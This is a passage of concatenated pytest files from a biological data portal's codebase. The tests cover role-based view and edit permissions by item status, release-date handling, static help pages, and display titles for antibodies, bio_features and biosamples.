res = submitter_testapp.post_json('/file_fastq', file_item, status=201)
for status in statuses:
wrangler_testapp.patch_json(res.json['@graph'][0]['@id'], {"status": status}, status=200)
viewing_group_member_testapp.patch_json(res.json['@graph'][0]['@id'], {'paired_end': '2'}, status=403)
def test_non_member_can_view_submitter_item(ind_human_item, submitter_testapp, wrangler_testapp, remc_member_testapp):
statuses = ['current', 'released', 'revoked', 'archived']
res = submitter_testapp.post_json('/individual_human', ind_human_item, status=201)
for status in statuses:
wrangler_testapp.patch_json(res.json['@graph'][0]['@id'], {"status": status}, status=200)
remc_member_testapp.get(res.json['@graph'][0]['@id'], status=200)
def test_non_member_can_view_submitter_file(file_item, submitter_testapp, wrangler_testapp, remc_member_testapp):
statuses = ['released', 'revoked', 'archived']
res = submitter_testapp.post_json('/file_fastq', file_item, status=201)
for status in statuses:
wrangler_testapp.patch_json(res.json['@graph'][0]['@id'], {"status": status}, status=200)
remc_member_testapp.get(res.json['@graph'][0]['@id'], status=200)
def test_non_member_cannot_view_submitter_item(ind_human_item, submitter_testapp, wrangler_testapp, remc_member_testapp):
statuses = ['released to project', 'archived to project', 'submission in progress',
'in review by lab', 'deleted', 'planned']
res = submitter_testapp.post_json('/individual_human', ind_human_item, status=201)
for status in statuses:
wrangler_testapp.patch_json(res.json['@graph'][0]['@id'], {"status": status}, status=200)
remc_member_testapp.get(res.json['@graph'][0]['@id'], status=403)
def test_non_member_cannot_view_submitter_file(file_item, submitter_testapp, wrangler_testapp, remc_member_testapp):
statuses = ['released to project', 'archived to project', 'uploading', 'uploaded', 'upload failed']
res = submitter_testapp.post_json('/file_fastq', file_item, status=201)
for status in statuses:
wrangler_testapp.patch_json(res.json['@graph'][0]['@id'], {"status": status}, status=200)
remc_member_testapp.get(res.json['@graph'][0]['@id'], status=403)
def test_everyone_can_view_lab_item(lab_item, submitter_testapp, wrangler_testapp, remc_member_testapp):
statuses = ['current', 'revoked', 'inactive']
apps = [submitter_testapp, wrangler_testapp, remc_member_testapp]
res = wrangler_testapp.post_json('/lab', lab_item, status=201)
for status in statuses:
wrangler_testapp.patch_json(res.json['@graph'][0]['@id'], {"status": status}, status=200)
for app in apps:
app.get(res.json['@graph'][0]['@id'], status=200)
def test_noone_can_view_deleted_lab_item(lab_item, submitter_testapp, wrangler_testapp, remc_member_testapp):
lab_item['status'] = 'deleted'
viewing_apps = [submitter_testapp, remc_member_testapp]
res = wrangler_testapp.post_json('/lab', lab_item, status=201)
for app in viewing_apps:
app.get(res.json['@graph'][0]['@id'], status=403)
def test_lab_submitter_can_edit_lab(lab, submitter_testapp, wrangler_testapp):
res = submitter_testapp.get(lab['@id'])
wrangler_testapp.patch_json(res.json['@id'], {'status': 'current'}, status=200)
submitter_testapp.patch_json(res.json['@id'], {'city': 'My fair city'}, status=200)
def test_statuses_that_lab_submitter_cannot_edit_lab(lab, submitter_testapp, wrangler_testapp):
statuses = ['deleted', 'revoked', 'inactive']
res = submitter_testapp.get(lab['@id'])
for status in statuses:
wrangler_testapp.patch_json(res.json['@id'], {'status': status}, status=200)
submitter_testapp.patch_json(res.json['@id'], {'city': 'My fair city'}, status=403)
def test_lab_submitter_cannot_edit_lab_name_or_title(lab, submitter_testapp, wrangler_testapp):
res = submitter_testapp.get(lab['@id'])
wrangler_testapp.patch_json(res.json['@id'], {'status': 'current'}, status=200)
submitter_testapp.patch_json(res.json['@id'], {'title': 'Test Lab, HMS'}, status=422)
submitter_testapp.patch_json(res.json['@id'], {'name': 'test-lab'}, status=422)
def test_wrangler_can_edit_lab_name_or_title(lab, submitter_testapp, wrangler_testapp):
statuses = ['deleted', 'revoked', 'inactive', 'current']
new_name = 'test-lab'
new_id = '/labs/test-lab/'
res = submitter_testapp.get(lab['@id'])
original_id = res.json['@id']
original_name = res.json['name']
for status in statuses:
wrangler_testapp.patch_json(original_id, {'status': status}, status=200)
wrangler_testapp.patch_json(original_id, {'title': 'Test Lab, HMS'}, status=200)
wrangler_testapp.patch_json(original_id, {'name': new_name}, status=200)
wrangler_testapp.patch_json(new_id, {'name': original_name}, status=200)
def test_ac_local_roles_for_lab(registry):
lab_data = {
'status': 'in review by lab',
'award': 'b0b9c607-bbbb-4f02-93f4-9895baa1334b',
'uuid': '828cd4fe-aaaa-4b36-a94a-d2e3a36aa989'
}
test_lab = Lab.create(registry, None, lab_data)
lab_ac_locals = test_lab.__ac_local_roles__()
assert('role.lab_submitter' in lab_ac_locals.values())
assert('role.lab_member' in lab_ac_locals.values())
def test_last_modified_works_correctly(ind_human_item, submitter, wrangler, submitter_testapp, wrangler_testapp):
res = submitter_testapp.post_json('/individual_human', ind_human_item, status=201).json['@graph'][0]
assert res['last_modified']['modified_by'] == submitter['@id']
# patch same item using a different user
res2 = wrangler_testapp.patch_json(res['@id'], {"status": "current"}, status=200).json['@graph'][0]
assert res2['last_modified']['modified_by'] == wrangler['@id']
assert res2['last_modified']['date_modified'] > res['last_modified']['date_modified']
@pytest.fixture
def individual_human(human, remc_lab, nofic_award, wrangler_testapp):
ind_human = {'lab': remc_lab['@id'], 'award': nofic_award['@id'], 'organism': human['@id']}
return wrangler_testapp.post_json('/individual_human', ind_human, status=201).json['@graph'][0]
def test_multi_viewing_group_viewer_can_view_nofic_when_submission_in_progress(
wrangler_testapp, multi_viewing_group_member_testapp, individual_human):
    wrangler_testapp.patch_json(individual_human['@id'], {'status': 'submission in progress'}, status=200)
    wrangler_testapp.get(individual_human['@id'], status=200)
multi_viewing_group_member_testapp.get(individual_human['@id'], status=200)
def test_viewing_group_viewer_cannot_view_nofic_when_submission_in_progress(
wrangler_testapp, viewing_group_member_testapp, individual_human):
wrangler_testapp.patch_json(individual_human['@id'], {'status': 'submission in progress'}, status=200)
viewing_group_member_testapp.get(individual_human['@id'], status=403)
### These aren't strictly permissions tests but putting them here so we don't need to
### move around wrangler and submitter testapps and associated fixtures
@pytest.fixture
def planned_experiment_set_data(lab, award):
return {
'lab': lab['@id'],
'award': award['@id'],
'description': 'test experiment set',
'experimentset_type': 'custom',
}
@pytest.fixture
def status2date():
return {
'released': 'public_release',
'released to project': 'project_release'
}
def test_planned_item_status_can_be_updated_by_admin(
submitter_testapp, wrangler_testapp, planned_experiment_set_data):
# submitter cannot change status so wrangler needs to patch
res1 = submitter_testapp.post_json('/experiment_set', planned_experiment_set_data).json['@graph'][0]
assert res1['status'] == 'in review by lab'
res2 = wrangler_testapp.patch_json(res1['@id'], {'status': 'planned'}).json['@graph'][0]
assert res2['status'] == 'planned'
def test_planned_item_status_is_not_changed_on_admin_patch(
submitter_testapp, wrangler_testapp, planned_experiment_set_data):
desc = 'updated description'
res1 = submitter_testapp.post_json('/experiment_set', planned_experiment_set_data).json['@graph'][0]
wrangler_testapp.patch_json(res1['@id'], {'status': 'planned'}, status=200)
res2 = wrangler_testapp.patch_json(res1['@id'], {'description': desc}).json['@graph'][0]
assert res2['description'] == desc
assert res2['status'] == 'planned'
def test_planned_item_status_is_changed_on_submitter_patch(
submitter_testapp, wrangler_testapp, planned_experiment_set_data):
desc = 'updated description'
res1 = submitter_testapp.post_json('/experiment_set', planned_experiment_set_data).json['@graph'][0]
wrangler_testapp.patch_json(res1['@id'], {'status': 'planned'}, status=200)
res2 = submitter_testapp.patch_json(res1['@id'], {'description': desc}).json['@graph'][0]
assert res2['description'] == desc
assert res2['status'] == 'submission in progress'
# these tests are for the item _update function as above so sticking them here
def test_unreleased_item_does_not_get_release_date(
wrangler_testapp, planned_experiment_set_data, status2date):
res1 = wrangler_testapp.post_json('/experiment_set', planned_experiment_set_data).json['@graph'][0]
assert res1['status'] == 'in review by lab'
for datefield in status2date.values():
assert datefield not in res1
def test_insert_of_released_item_does_get_release_date(
wrangler_testapp, planned_experiment_set_data, status2date):
for status, datefield in status2date.items():
planned_experiment_set_data['status'] = status
res = wrangler_testapp.post_json('/experiment_set', planned_experiment_set_data).json['@graph'][0]
assert res['status'] == status
assert res[datefield] == date.today().isoformat()
if status in ['released', 'current']:
assert res['project_release'] == res['public_release']
def test_update_of_item_to_released_status_adds_release_date(
wrangler_testapp, planned_experiment_set_data, status2date):
for status, datefield in status2date.items():
res1 = wrangler_testapp.post_json('/experiment_set', planned_experiment_set_data).json['@graph'][0]
assert res1['status'] == 'in review by lab'
assert datefield not in res1
res2 = wrangler_testapp.patch_json(res1['@id'], {'status': status}, status=200).json['@graph'][0]
assert res2['status'] == status
assert res2[datefield] == date.today().isoformat()
if status == 'released to project':
assert 'public_release' not in res2
if status in ['released', 'current']:
assert res2['project_release'] == res2['public_release']
def test_update_of_item_to_non_released_status_does_not_add_release_date(
wrangler_testapp, planned_experiment_set_data):
statuses = ["planned", "revoked", "deleted", "obsolete", "replaced", "in review by lab", "submission in progress"]
datefields = ['public_release', 'project_release']
for status in statuses:
res1 = wrangler_testapp.post_json('/experiment_set', planned_experiment_set_data).json['@graph'][0]
assert res1['status'] == 'in review by lab'
res2 = wrangler_testapp.patch_json(res1['@id'], {'status': status}, status=200).json['@graph'][0]
assert res2['status'] == status
for datefield in datefields:
assert datefield not in res1
assert datefield not in res2
def test_update_of_item_that_has_release_date_does_not_change_release_date(
wrangler_testapp, planned_experiment_set_data, status2date):
test_date = '2001-01-01'
for status, datefield in status2date.items():
planned_experiment_set_data[datefield] = test_date
res1 = wrangler_testapp.post_json('/experiment_set', planned_experiment_set_data).json['@graph'][0]
assert res1['status'] == 'in review by lab'
assert res1[datefield] == test_date
res2 = wrangler_testapp.patch_json(res1['@id'], {'status': status}, status=200).json['@graph'][0]
assert res2['status'] == status
assert res2[datefield] == test_date
def test_update_of_item_without_release_dates_mixin(wrangler_testapp, award):
assert award['status'] == 'current'
datefields = ['public_release', 'project_release']
for field in datefields:
assert field not in award
# tests for bogus nofic specific __ac_local_roles__
def test_4dn_can_view_nofic_released_to_project(
planned_experiment_set_data, wrangler_testapp, viewing_group_member_testapp,
nofic_award):
eset_item = planned_experiment_set_data
eset_item['award'] = nofic_award['@id']
eset_item['status'] = 'released to project'
res1 = wrangler_testapp.post_json('/experiment_set', eset_item).json['@graph'][0]
viewing_group_member_testapp.get(res1['@id'], status=200)
def test_4dn_cannot_view_nofic_not_joint_analysis_planned_and_in_progress(
planned_experiment_set_data, wrangler_testapp, viewing_group_member_testapp,
nofic_award):
statuses = ['planned', 'submission in progress']
eset_item = planned_experiment_set_data
eset_item['award'] = nofic_award['@id']
for status in statuses:
eset_item['status'] = status
res1 = wrangler_testapp.post_json('/experiment_set', eset_item).json['@graph'][0]
viewing_group_member_testapp.get(res1['@id'], status=403)
def test_4dn_can_view_nofic_joint_analysis_planned_and_in_progress(
planned_experiment_set_data, wrangler_testapp, viewing_group_member_testapp,
nofic_award):
statuses = ['planned', 'submission in progress']
eset_item = planned_experiment_set_data
eset_item['award'] = nofic_award['@id']
eset_item['tags'] = ['Joint Analysis']
for status in statuses:
eset_item['status'] = status
res1 = wrangler_testapp.post_json('/experiment_set', eset_item).json['@graph'][0]
viewing_group_member_testapp.get(res1['@id'], status=200)
@pytest.fixture
def replicate_experiment_set_data(lab, award):
return {
'lab': lab['@id'],
'award': award['@id'],
'description': 'test replicate experiment set',
'experimentset_type': 'replicate',
}
def test_ready_to_process_set_status_admin_can_edit(
submitter_testapp, wrangler_testapp, replicate_experiment_set_data):
res1 = submitter_testapp.post_json('/experiment_set_replicate', replicate_experiment_set_data).json['@graph'][0]
assert res1['status'] == 'in review by lab'
res2 = wrangler_testapp.patch_json(res1['@id'], {'status': 'pre-release'}).json['@graph'][0]
assert res2['status'] == 'pre-release'
# admin can Edit
res3 = wrangler_testapp.patch_json(res1['@id'], {'description': 'admin edit'}, status=200).json['@graph'][0]
assert res3['description'] == 'admin edit'
def test_ready_to_process_set_status_submitter_can_view(
submitter_testapp, wrangler_testapp, replicate_experiment_set_data):
res1 = submitter_testapp.post_json('/experiment_set_replicate', replicate_experiment_set_data).json['@graph'][0]
assert res1['status'] == 'in review by lab'
res2 = wrangler_testapp.patch_json(res1['@id'], {'status': 'pre-release'}).json['@graph'][0]
assert res2['status'] == 'pre-release'
# submitter can view
res3 = submitter_testapp.get(res1['@id'], status=200).json
assert res3['description'] == 'test replicate experiment set'
def test_ready_to_process_set_status_submitter_can_not_edit(
submitter_testapp, wrangler_testapp, replicate_experiment_set_data):
res1 = submitter_testapp.post_json('/experiment_set_replicate', replicate_experiment_set_data).json['@graph'][0]
assert res1['status'] == 'in review by lab'
res2 = wrangler_testapp.patch_json(res1['@id'], {'status': 'pre-release'}).json['@graph'][0]
assert res2['status'] == 'pre-release'
# submitter can not edit
submitter_testapp.patch_json(res1['@id'], {'description': 'submitter edit'}, status=403)
def test_ready_to_process_set_status_others_can_not_view(
submitter_testapp, wrangler_testapp, viewing_group_member_testapp, replicate_experiment_set_data):
res1 = submitter_testapp.post_json('/experiment_set_replicate', replicate_experiment_set_data).json['@graph'][0]
assert res1['status'] == 'in review by lab'
res2 = wrangler_testapp.patch_json(res1['@id'], {'status': 'pre-release'}).json['@graph'][0]
assert res2['status'] == 'pre-release'
# others can not view
viewing_group_member_testapp.get(res1['@id'], status=403)
@pytest.fixture
def static_section_item():
return {
'name': 'static-section.test_ss',
'title': 'Test Static Section',
'body': 'This is a test section'
}
def test_static_section_with_lab_view_by_lab_member(
wrangler_testapp, lab_viewer_testapp, lab, static_section_item):
static_section_item['lab'] = lab['@id']
static_section_item['status'] = 'released to lab'
res = wrangler_testapp.post_json('/static_section', static_section_item).json['@graph'][0]
lab_viewer_testapp.get(res['@id'], status=200)
def test_permissions_validate_false(award, lab, file_formats, submitter_testapp, wrangler_testapp):
"""
Only admin can use validate=false with POST/PUT/PATCH
"""
file_item_body = {
'award': award['uuid'],
'lab': lab['uuid'],
'file_format': file_formats.get('fastq').get('uuid'),
'paired_end': '1'
}
# does it matter that the wrangler posts this? I don't think so for this test - Will 03/23/2021
res = submitter_testapp.post_json('/file_fastq', file_item_body, status=201)
# no permissions
submitter_testapp.post_json('/file_fastq/?validate=false', file_item_body, status=403)
submitter_testapp.patch_json(res.json['@graph'][0]['@id'] + '?validate=false',
{'paired_end': '1'}, status=403)
submitter_testapp.put_json(res.json['@graph'][0]['@id'] + '?validate=false',
file_item_body, status=403)
# okay permissions
try:
wrangler_testapp.post_json('/file_fastq/?validate=false&upgrade=False', file_item_body, status=201)
except TypeError: # thrown from open_data_url, but should make it there
pass # we are ok, any other exception should be thrown
wrangler_testapp.patch_json(res.json['@graph'][0]['@id'] + '?validate=false',
{'paired_end': '1'}, status=200)
try:
wrangler_testapp.put_json(res.json['@graph'][0]['@id'] + '?validate=false',
file_item_body, status=200)
except TypeError: # thrown from open_data_url, but should make it there
pass # we are ok, any other exception should be thrown
```
#### File: encoded/tests/test_root.py
```python
from unittest import mock
from ..root import uptime_info
from dcicutils import lang_utils
from dcicutils.misc_utils import ignored
def test_uptime_info():
with mock.patch("uptime.uptime", return_value=65 * 60):
assert uptime_info() == "1 hour, 5 minutes"
def fail(*args, **kwargs):
ignored(args, kwargs)
raise RuntimeError("Failure")
with mock.patch("uptime.uptime", side_effect=fail):
assert uptime_info() == "unavailable"
with mock.patch.object(lang_utils, "relative_time_string", fail):
assert uptime_info() == "unavailable"
```
#### File: encoded/tests/test_static_page.py
```python
import pytest
import webtest
from dcicutils.qa_utils import notice_pytest_fixtures
from .workbook_fixtures import app_settings, app # are these needed? -kmp 12-Mar-2021
notice_pytest_fixtures(app_settings, app)
pytestmark = [pytest.mark.indexing, pytest.mark.working]
@pytest.fixture(scope='module')
def help_page_section_json():
return {
"title": "",
"name" : "help.user-guide.rest-api.rest_api_submission",
"file": "/docs/source/rest_api_submission.rst",
"uuid" : "442c8aa0-dc6c-43d7-814a-854af460b020"
}
@pytest.fixture(scope='module')
def help_page_json():
return {
"name": "help/user-guide/rest-api",
"title": "The REST-API",
"content": ["442c8aa0-dc6c-43d7-814a-854af460b020"],
"uuid": "a2aa8bb9-9dd9-4c80-bdb6-2349b7a3540d",
"table-of-contents": {
"enabled": True,
"header-depth": 4,
"list-styles": ["decimal", "lower-alpha", "lower-roman"]
}
}
@pytest.fixture(scope='module')
def help_page_json_draft():
return {
"name": "help/user-guide/rest-api-draft",
"title": "The REST-API",
"content": ["442c8aa0-dc6c-43d7-814a-854af460b020"],
"uuid": "a2aa8bb9-9dd9-4c80-bdb6-2349b7a3540c",
"table-of-contents": {
"enabled": True,
"header-depth": 4,
"list-styles": ["decimal", "lower-alpha", "lower-roman"]
},
"status" : "draft"
}
@pytest.fixture(scope='module')
def help_page_json_deleted():
return {
"name": "help/user-guide/rest-api-deleted",
"title": "The REST-API",
"content": ["442c8aa0-dc6c-43d7-814a-854af460b020"],
"uuid": "a2aa8bb9-9dd9-4c80-bdb6-2349b7a3540a",
"table-of-contents": {
"enabled": True,
"header-depth": 4,
"list-styles": ["decimal", "lower-alpha", "lower-roman"]
},
"status" : "deleted"
}
@pytest.fixture(scope='module')
def posted_help_page_section(testapp, help_page_section_json):
try:
res = testapp.post_json('/static-sections/', help_page_section_json, status=201)
val = res.json['@graph'][0]
except webtest.AppError:
res = testapp.get('/' + help_page_section_json['uuid'], status=301).follow()
val = res.json
return val
@pytest.fixture(scope='module')
def help_page(testapp, posted_help_page_section, help_page_json):
try:
res = testapp.post_json('/pages/', help_page_json, status=201)
val = res.json['@graph'][0]
except webtest.AppError:
res = testapp.get('/' + help_page_json['uuid'], status=301).follow()
val = res.json
return val
@pytest.fixture(scope='module')
def help_page_deleted(testapp, posted_help_page_section, help_page_json_draft):
try:
res = testapp.post_json('/pages/', help_page_json_draft, status=201)
val = res.json['@graph'][0]
except webtest.AppError:
res = testapp.get('/' + help_page_json_draft['uuid'], status=301).follow()
val = res.json
return val
@pytest.fixture(scope='module')
def help_page_restricted(testapp, posted_help_page_section, help_page_json_deleted):
try:
res = testapp.post_json('/pages/', help_page_json_deleted, status=201)
val = res.json['@graph'][0]
except webtest.AppError:
res = testapp.get('/' + help_page_json_deleted['uuid'], status=301).follow()
val = res.json
return val
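# The three page fixtures above all follow the same "post it, or fetch the
# already-posted item by uuid" idiom used for module-scoped workbook data.
# A hypothetical helper (illustrative only) that captures the pattern:
def _post_or_get_existing(app, collection_url, body):
    try:
        return app.post_json(collection_url, body, status=201).json['@graph'][0]
    except webtest.AppError:
        return app.get('/' + body['uuid'], status=301).follow().json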
def test_get_help_page(testapp, help_page):
help_page_url = "/" + help_page['name']
res = testapp.get(help_page_url, status=200)
assert res.json['@id'] == help_page_url
assert res.json['@context'] == help_page_url
assert 'HelpPage' in res.json['@type']
assert 'StaticPage' in res.json['@type']
# assert res.json['content'] == help_page['content']  # No longer works; the latter is now an @id of a static_section
assert 'Accession and uuid are automatically assigned during initial posting' in res.json['content'][0]['content']  # Instead, check that what is embedded on the GET request comes from our doc file (rest_api_submission.rst).
assert res.json['toc'] == help_page['table-of-contents']
def test_get_help_page_deleted(anonhtmltestapp, help_page_deleted):
help_page_url = "/" + help_page_deleted['name']
anonhtmltestapp.get(help_page_url, status=403)
def test_get_help_page_no_access(anonhtmltestapp, testapp, help_page_restricted):
help_page_url = "/" + help_page_restricted['name']
anonhtmltestapp.get(help_page_url, status=403)
testapp.get(help_page_url, status=200)
def test_page_unique_name(testapp, help_page, help_page_deleted):
# POST again with same name and expect validation error
new_page = {'name': help_page['name']}
res = testapp.post_json('/page', new_page, status=422)
expected_val_err = "%s already exists with name '%s'" % (help_page['uuid'], new_page['name'])
actual_error_description = res.json['errors'][0]['description']
print("expected:", expected_val_err)
print("actual:", actual_error_description)
assert expected_val_err in actual_error_description
# also test PATCH of an existing page with another name
res = testapp.patch_json(help_page_deleted['@id'], {'name': new_page['name']}, status=422)
assert expected_val_err in res.json['errors'][0]['description']
```
#### File: encoded/tests/test_types_antibody.py
```python
import pytest
pytestmark = [pytest.mark.setone, pytest.mark.working, pytest.mark.schema]
@pytest.fixture
def antibody_data(lab, award):
return {
'lab': lab['@id'],
'award': award['@id'],
'description': 'Test Antibody',
'antibody_name': 'test-Ab',
'antibody_product_no': '123'
}
@pytest.fixture
def post_antibody_vendor(testapp, lab, award):
item = {'lab': lab['@id'],
'award': award['@id'],
'title': 'Vendor Biolabs'}
return testapp.post_json('/vendor', item).json['@graph'][0]
@pytest.fixture
def ab_w_name(testapp, antibody_data):
return testapp.post_json('/antibody', antibody_data).json['@graph'][0]
def test_antibody_update_antibody_id(ab_w_name):
assert ab_w_name['antibody_id'] == 'test-Ab-123'
def test_antibody_display_title(testapp, ab_w_name, post_antibody_vendor):
assert ab_w_name['display_title'] == 'test-Ab (123)'
res = testapp.patch_json(
ab_w_name['@id'],
{'antibody_vendor': post_antibody_vendor['@id']}
).json['@graph'][0]
assert res['display_title'] == 'test-Ab (Vendor Biolabs, 123)'
```
#### File: encoded/tests/test_types_bio_feature.py
```python
import pytest
pytestmark = [pytest.mark.working, pytest.mark.schema]
@pytest.fixture
def so_ont(testapp):
return testapp.post_json('/ontology', {'ontology_name': 'SO'}).json['@graph'][0]
@pytest.fixture
def protein_term(testapp, so_ont):
gterm = {
'uuid': '8bea5bde-d860-49f8-b178-35d0dadbd644',
'term_id': 'SO:0000104', 'term_name': 'polypeptide',
'preferred_name': 'protein',
'source_ontologies': [so_ont['@id']]}
return testapp.post_json('/ontology_term', gterm).json['@graph'][0]
@pytest.fixture
def region_term(testapp, so_ont):
gterm = {
'uuid': '6bea5bde-d860-49f8-b178-35d0dadbd644',
'term_id': 'SO:0000001', 'term_name': 'region',
'source_ontologies': [so_ont['@id']]}
return testapp.post_json('/ontology_term', gterm).json['@graph'][0]
@pytest.fixture
def transcript_term(testapp, so_ont):
gterm = {
'uuid': '5bea5bde-d860-49f8-b178-35d0dadbd644',
'term_id': 'SO:0000673', 'term_name': 'transcript',
'source_ontologies': [so_ont['@id']]}
return testapp.post_json('/ontology_term', gterm).json['@graph'][0]
@pytest.fixture
def component_term(testapp, so_ont):
gterm = {
'uuid': '4bea5bde-d860-49f8-b178-35d0dadbd644',
'term_id': 'GO:0005575', 'term_name': 'cellular_component',
'source_ontologies': [so_ont['@id']]}
return testapp.post_json('/ontology_term', gterm).json['@graph'][0]
@pytest.fixture
def gene_item(testapp, lab, award, human):
gene_item = {'lab': lab['@id'], 'award': award['@id'], 'geneid': '5885'}
return testapp.post_json('/gene', gene_item).json['@graph'][0]
@pytest.fixture
def mouse_gene_item(testapp, lab, award, mouse):
gene_item = {'lab': lab['@id'], 'award': award['@id'], 'geneid': '16825'}
return testapp.post_json('/gene', gene_item).json['@graph'][0]
@pytest.fixture
def armadillo_gene_item(testapp, lab, award):
gene_item = {'lab': lab['@id'], 'award': award['@id'], 'geneid': '101428042'}
return testapp.post_json('/gene', gene_item).json['@graph'][0]
@pytest.fixture
def gene_bio_feature(testapp, lab, award, gene_term, gene_item, human):
item = {'award': award['@id'],
'lab': lab['@id'],
'description': 'Test Gene BioFeature',
'feature_type': gene_term['@id'],
'organism_name': 'human',
'relevant_genes': [gene_item['@id']]}
return testapp.post_json('/bio_feature', item).json['@graph'][0]
@pytest.fixture
def mouse_gene_bio_feature(testapp, lab, award, gene_term, mouse_gene_item, human, mouse):
item = {'award': award['@id'],
'lab': lab['@id'],
'description': 'Test Mouse Gene BioFeature',
'feature_type': gene_term['@id'],
'organism_name': 'mouse',
'relevant_genes': [mouse_gene_item['@id']]}
return testapp.post_json('/bio_feature', item).json['@graph'][0]
@pytest.fixture
def armadillo_gene_bio_feature(testapp, lab, award, gene_term, armadillo_gene_item):
item = {'award': award['@id'],
'lab': lab['@id'],
'description': 'Test Armadillo Gene BioFeature',
'feature_type': gene_term['@id'],
'relevant_genes': [armadillo_gene_item['@id']]}
return testapp.post_json('/bio_feature', item).json['@graph'][0]
@pytest.fixture
def multi_species_gene_bio_feature(testapp, lab, award, gene_term, gene_item, mouse_gene_item, human, mouse):
item = {'award': award['@id'],
'lab': lab['@id'],
'description': 'Test Multi Gene BioFeature',
'feature_type': gene_term['@id'],
'organism_name': 'multiple organisms',
'relevant_genes': [mouse_gene_item['@id'], gene_item['@id']]}
return testapp.post_json('/bio_feature', item).json['@graph'][0]
@pytest.fixture
def genomic_region_bio_feature(testapp, lab, award, region_term, some_genomic_region, human):
item = {'award': award['@id'],
'lab': lab['@id'],
'description': 'Test Region BioFeature',
'feature_type': region_term['@id'],
'organism_name': 'human',
'genome_location': [some_genomic_region['@id']]}
return testapp.post_json('/bio_feature', item).json['@graph'][0]
def test_bio_feature_display_title_gene(gene_bio_feature, gene_item):
assert gene_bio_feature.get('display_title') == gene_item.get('display_title') + ' gene'
def test_bio_feature_display_title_genomic_region(genomic_region_bio_feature):
assert genomic_region_bio_feature.get('display_title') == 'GRCh38:1:17-544 region'
def test_bio_feature_display_title_genomic_region_w_preferred_label(testapp, genomic_region_bio_feature):
label = 'awesome region'
res = testapp.patch_json(genomic_region_bio_feature['@id'], {'preferred_label': label}, status=200)
assert res.json['@graph'][0].get('display_title') == label
def test_bio_feature_display_title_protein_transcript(
testapp, gene_item, gene_bio_feature, protein_term, transcript_term):
''' gene_bio_feature is in datafixtures '''
types = [protein_term, transcript_term]
for t in types:
res = testapp.patch_json(gene_bio_feature['@id'], {'feature_type': t['@id']}, status=200)
assert res.json['@graph'][0].get('display_title') == gene_item.get('display_title') + ' ' + t.get('display_title')
def test_bio_feature_display_title_modified_protein(
testapp, gene_item, gene_bio_feature, protein_term):
''' gene_bio_feature is in datafixtures '''
res = testapp.patch_json(
gene_bio_feature['@id'],
{
'feature_type': protein_term['@id'],
'feature_mods': [{
'mod_type': 'Methylation',
'mod_position': 'K9'
}]
},
status=200)
assert res.json['@graph'][0].get('display_title') == 'RAD21 protein with K9 Methylation'
def test_bio_feature_display_title_cellular_component(testapp, component_term, lab, award):
struct = 'Nuclear pore complex'
item = {
'feature_type': component_term['@id'],
'cellular_structure': struct,
'lab': lab['@id'],
'award': award['@id'],
'description': 'test structure'
}
res = testapp.post_json('/bio_feature', item, status=201)
assert res.json['@graph'][0].get('display_title') == struct
def test_bio_feature_display_title_mouse_gene(
mouse_gene_bio_feature, mouse_gene_item):
assert mouse_gene_bio_feature.get('display_title') == mouse_gene_item.get('display_title') + ' mouse gene'
def test_bio_feature_display_title_multi_species_gene(
multi_species_gene_bio_feature):
assert multi_species_gene_bio_feature.get('display_title') == 'Ldb1, RAD21 genes multiple organisms'
def test_bio_feature_display_title_unknown_organism_gene(
armadillo_gene_bio_feature, armadillo_gene_item):
assert armadillo_gene_bio_feature.get('display_title') == armadillo_gene_item.get('display_title') + ' gene'
def test_bio_feature_display_title_preferred_name_w_org(
testapp, mouse_gene_bio_feature):
mfeat = testapp.patch_json(mouse_gene_bio_feature['@id'], {'preferred_label': 'Cool gene'}, status=200).json['@graph'][0]
assert mfeat.get('display_title') == 'Cool gene (mouse)'
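# Taken together, the assertions above pin down the bio_feature display_title
# rules: a preferred_label wins outright (with '(mouse)' appended in the mouse
# example), genes render as '<gene> gene' or '<gene> mouse gene', regions as
# '<location> region', modified proteins as '<gene> protein with <position>
# <mod_type>', and cellular components fall back to the cellular_structure
# string itself.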
```
#### File: encoded/tests/test_types_biosample.py
```python
import pytest
# from snovault.schema_utils import load_schema
pytestmark = [pytest.mark.setone, pytest.mark.working, pytest.mark.schema]
@pytest.fixture
def biosample_cc_w_diff(testapp, de_term, lab, award):
item = {
"culture_start_date": "2018-01-01",
"differentiation_state": "Differentiated to definitive endoderm demonstrated by decreased Oct4 expression and increased Sox17 expression",
"tissue": de_term['@id'],
"in_vitro_differentiated": "Yes",
'award': award['@id'],
'lab': lab['@id']
}
return testapp.post_json('/biosample_cell_culture', item).json['@graph'][0]
@pytest.fixture
def biosample_1(testapp, human_biosource, lab, award):
item = {
'description': "GM12878 prepared for Hi-C",
'biosource': [human_biosource['@id'], ],
'award': award['@id'],
'lab': lab['@id'],
}
return testapp.post_json('/biosample', item).json['@graph'][0]
@pytest.fixture
def biosample_w_mod(testapp, biosample_1, mod_w_target):
return testapp.patch_json(biosample_1['@id'], {'modifications': [mod_w_target['@id']]}).json['@graph'][0]
@pytest.fixture
def biosample_w_treatment(testapp, biosample_1, rnai):
return testapp.patch_json(biosample_1['@id'], {'treatments': [rnai['@id']]}).json['@graph'][0]
def biosample_relation(derived_from):
return {"biosample_relation": [{"relationship_type": "derived from",
"biosample": derived_from['@id']}]}
def test_biosample_has_display_title(testapp, biosample_1):
# accession fallback used for display title here
assert biosample_1['display_title'] == biosample_1['accession']
# data from test/datafixtures
def test_update_biosample_relation(testapp, human_biosample, biosample_1):
patch_res = testapp.patch_json(human_biosample['@id'], biosample_relation(biosample_1))
res = testapp.get(biosample_1['@id'])
# expected relation: 'biosample': human_biosample['@id'],
# 'relationship_type': 'parent of'
assert res.json['biosample_relation'][0]['biosample']['@id'] == human_biosample['@id']
assert res.json['biosample_relation'][0]['relationship_type'] == 'parent of'
def test_biosample_calculated_properties(testapp, biosample_1, ):
"""
Test to ensure the calculated properties are in result returned from testapp
These have string 'None' returned if no value as they are used in Item page view
"""
res = testapp.get(biosample_1['@id']).json
assert 'modifications_summary' in res
assert 'modifications_summary_short' in res
assert 'treatments_summary' in res
assert 'biosource_summary' in res
def test_biosample_biosource_summary_one_biosource(testapp, biosample_1, human_biosource):
assert biosample_1['biosource_summary'] == human_biosource['biosource_name']
def test_biosample_biosource_summary_two_biosource(testapp, biosample_1, human_biosource, lung_biosource):
res = testapp.patch_json(biosample_1['@id'], {'biosource': [human_biosource['@id'], lung_biosource['@id']]}).json['@graph'][0]
assert human_biosource['biosource_name'] in res['biosource_summary']
assert lung_biosource['biosource_name'] in res['biosource_summary']
assert ' and ' in res['biosource_summary']
def test_biosample_biosource_summary_w_differentiation(testapp, biosample_1, human_biosource, biosample_cc_w_diff, de_term):
